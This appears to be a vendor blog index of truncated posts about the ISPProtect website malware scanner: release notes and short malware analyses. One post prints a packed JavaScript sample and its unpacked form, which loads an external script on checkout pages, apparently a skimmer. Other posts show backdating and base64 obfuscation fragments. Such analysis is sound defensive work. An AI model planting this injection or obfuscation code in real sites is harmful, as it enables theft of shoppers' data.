An essential component of the analysis and cleanup of websites infected with malware is viewing and evaluating the log files. However, even here there are things to consider that might seem odd at first glance. Let’s say you find a
Version 1.32.3 of ISPProtect released today now also detects FoxAuto including different variants. FoxAuto is a collection of tools that can be used to download and execute additional malicious scripts via vulnerabilities in a website (WordPress, its plugins, Joomla, etc.).
Today we released version 1.31.2 of ISPProtect Malware Scanner. To update your ISPProtect instance, use ispp_scan –update. New signatures We have added several new signatures and heuristics to the scanner. As a result, even more potentially malicious PHP scripts are
Today we have released the beta version 1.30.0 of the ISPProtect Malware Scanner. To update your ISPProtect instance to the beta version, use ispp_scan –update –channel=beta. Be aware that this beta version might still contain bugs. Deep scan Some attackers
With today’s version 1.29.0 of ISPProtect we have made some improvements to the code. The database scan has also been enhanced. In the standard mode using the parameter –db-scan only a small subset of the malware heuristics will be applied
As the zscaler team recently reported, there are frequent malware, phishing and virus finds in the .well-known directories on web servers. These directories are used, for example, to confirm domain ownership when a certificate is issued. The widely used “Let’s
Few days ago I was hired to clean-up a hacked WordPress page that was affected by the security issue in the WP GDPR Compliance plugin. The attacker created a new admin user and changed/uploaded some files to WordPress. For that
Today we are proud to announce our next major release 1.25.0. What has changed? We introduced a new scan level 1.1 to the scan that searches for PHP code hidden inside of image file names. It is a wide-spread tactic
Today we released the new version 1.24.13 of ISPProtect malware scanner. It includes some new malware signatures and new heuristics for dynamic malware code of which we want to show you a new type of malware that is hard to
Today we released version 1.24.7 of ISPProtect. The new version contains new heuristics to recognize further malicious code. Following we take a closer look at some malicious code snippet. $a = base64_decode($b); for($i = 0; $i < strlen($a); $i++){ $a[$i]
Today we released a new version of ISPProtect that contains improved malware heuristics. It focusses on malware that tries to hide itself or created files by setting file modification types to somewhat in the past. E. g.: <?php touch(‘/path/to/file’, time()
Today we released version 1.23.0 of our malware scanning tool. With this release we added a feature to “unpack” some JavaScripts that were minified. For example: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘1.4=5(){6((2 7(\’8|9|a\’)).b(1.c)){$$(\’d\’)[0].e(2 f(\’g\’,{h:\’i/j\’,k:\’l://m.n.o/p/3/q/r.3\’}))}}’,28,28,’|window|new|js|onload|function|if|RegExp|onepage|checkout|onestep|test|location|head|appendChild|Element|script|type|text|javascript|src|https|boutique|postedecoute|ca|media|shipping|ups’.split(‘|’),0,{})); will be unpacked to window.onload=function(){if((new RegExp(‘onepage|checkout|onestep’)).test(window.location)){$$(‘head’)[0].appendChild(new Element(‘script’,{type:’text/javascript’,src:’https://boutique.postedecoute.ca/media/js/shipping/ups.js’}))}}
Today we released version 1.21.1 of our malware scanner ISPProtect. It adds further improvements and new signatures for an even better malware recognition. With this blog post we want to show you a crypted, let’s say creative, type of malware.
Today we released version 1.19.0 of the ISPProtect malware scanner. For this release we focussed on new malware signatures and a further improvement of scanning speed in level 2. We managed to lower the scan time to less than 50%
Today we released the brand new version 1.13.0 of our malware scanner ISPProtect. We added a lot of new signatures and heuristics that address more than 20 types of new malware. In addition, to provide more flexibility, we implemented a
Today we released version 1.9.4 of the ISPProtect malware scanner. The scanner can now be run on servers with PHP version 7.0. In addition we added a new feature to scan all wordpress installations on the server for outdated plugins.
Today we released our new ISPProtect service. Now you can scan your web space via FTP. This service targets web hosting customers that don’t have SSH access to their website and cannot run our downloadable version of ISPProtect. All data
In the first part of this article series we showed you a simple form of php malware: the base64 encoded eval. Today we’ll have a look at some other form of malicious piece of PHP code. Escaped characters (hex codes
These days we released our new ISPProtect product: the ISPProtect BanDaemon. It is free to use for all our customers that own a valid 12-month-license for the ISPProtect Scanner – but we also offer a 30-days-trial for all other users.
In this article we want to show you some examples of malware code. Sometimes it is easy to decide, whether a part of code is malicious, sometimes it’s not. Malware with eval and base64_decode This form of malware is one